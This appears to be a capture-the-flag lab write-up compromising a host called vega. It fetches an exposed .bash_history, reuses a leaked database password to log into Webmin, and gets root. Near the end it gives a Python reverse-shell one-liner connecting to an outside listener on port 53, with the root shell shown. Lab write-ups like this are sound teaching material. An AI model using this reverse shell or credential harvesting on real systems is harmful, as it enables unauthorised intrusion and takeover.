As always, we start with an nmap scan.
E:\PENTEST\NMAP>nmap -A 10.150.150.222 Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-08 08:56 W. Europe Standard Time Nmap scan report for vega (10.150.150.222) Host is up (0.031s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 af:56:59:c5:9a:de:f4:a9:b7:8f:34:4b:a2:21:24:71 (RSA) | 256 1b:e8:16:d4:dc:a6:7a:3e:5d:6f:f2:95:5a:59:08:9a (ECDSA) |_ 256 9c:35:dd:da:ee:a9:b4:0b:55:68:45:fd:8f:85:35:30 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Did not follow redirect to http://10.150.150.222/?SID=u4lc77vbafcrv7vrskh0c4ciqa 8089/tcp open ssl/http Splunkd httpd |_http-server-header: Splunkd |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Not valid before: 2019-10-25T09:19:54 |_Not valid after: 2022-10-24T09:19:54 10000/tcp open http MiniServ 1.941 (Webmin httpd) |_http-server-header: MiniServ/1.941 |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4.26 OS details: Linux 2.4.26 (Slackware 10.0.0) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 ... 2 31.00 ms vega (10.150.150.222) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 89.51 seconds E:\PENTEST\NMAP>
.
C:\Users\puckiestyle>curl http://10.150.150.222/.bash_history
history
sudo apt-get update && apt-get upgrade -y
sudo apt install apache2
sudo systemctl enable apache2
sudo apt install mariadb-server
sudo a2enmod rewrite
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo a2dissite 000-default.conf
flag40=3e11129fe2d30563999cd1d5602a1f7eb90e2176
sudo systemctl reload apache2
sudo a2ensite magento2.example.com.conf
sudo systemctl reload apache2
cd /tmp/
cd logstalgia-1.0.3/
./configure
sudo passwd root
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc
./configure
make
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc++
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc
apt-get install make
mysql -u root -p
apt-get install grsync
apt-get install unison
unisonsudo systemctl restart apache2
ping 1.1.1.1
ping 8.8.8.8
sudo apt install software-properties-common
sudo apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
sudo add-apt-repository 'deb http://mirrors.coreix.net/mariadb/repo/10.2/ubuntu xenial main'
sudo apt update
echo FLAG40=3e11129fe2d30563999cd1d5602a1f7eb90e2176
sudo apt install mariadb-server -y
netstat -np | grep 22
mysql -u root -p
mysql -u magento -p
sudo apt install php7.0 php7.0-curl php7.0-mysql libapache2-mod-php7.0
sudo nano /etc/php/7.2/cli/php.ini
ipconfig
ifconfig
sudo nano /etc/php/7.2/apache2/php.ini
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo crontab -u vega -e
sudo systemctl restart apache2
sudo cat /var/log/apache2/error.log
sudo chown -R www-data:www-data .
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo /etc/init.d/apache2 restart
sudo nano /etc/apt/sources.list
cd /tmp/
wget http://www.webmin.com/jcameron-key.asc
sudo systemctl reload apache2
cd /tmp/
cd logstalgia-1.0.3/
./configure
cd /home/vega
ls -lah
ifconfig
sudo passwd rootsudo apt-key add jcameron-key.asc
sudo apt update
sudo apt install webmin
cd ..
history
mysqldump -u vega --password=puplfiction1994 magento2 > dumpmagento.sql
cd /home/vega
ls -lah
ll
sudo su
cd /root/
nano CAM.shortcut
C:\Users\puckiestyle>
We can use vega / pulpfiction1994 to log on to https://vega:10000 (Webmin). The credential comes from the `mysqldump -u vega --password=puplfiction1994 magento2 > dumpmagento.sql` line in the .bash_history that the web server exposed above; note that the spelling captured there differs from the one used here. Passing the password on the command line is what persisted it in the shell history in the first place.
.
. .
.
> ls CAM.shortcut FLAG42.txt > cat FLAG42.txt 95beef4e71ae3a503282ac54acb6d9cdc547f8c8 > whoami root > hostname vega > cat CAM.shortcut URL: http://10.150.150.250 Notes: Do not forget the cam is only reachable from this jumpstation and another one. [ stuntman mike ]
To get a reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.66.66.42",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
.
E:\PENTEST>nc -nlvp 53 listening on [any] 53 ... connect to [10.66.66.42] from (UNKNOWN) [10.150.150.222] 46718 /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root) # hostname vega #
Author : Puckiestyle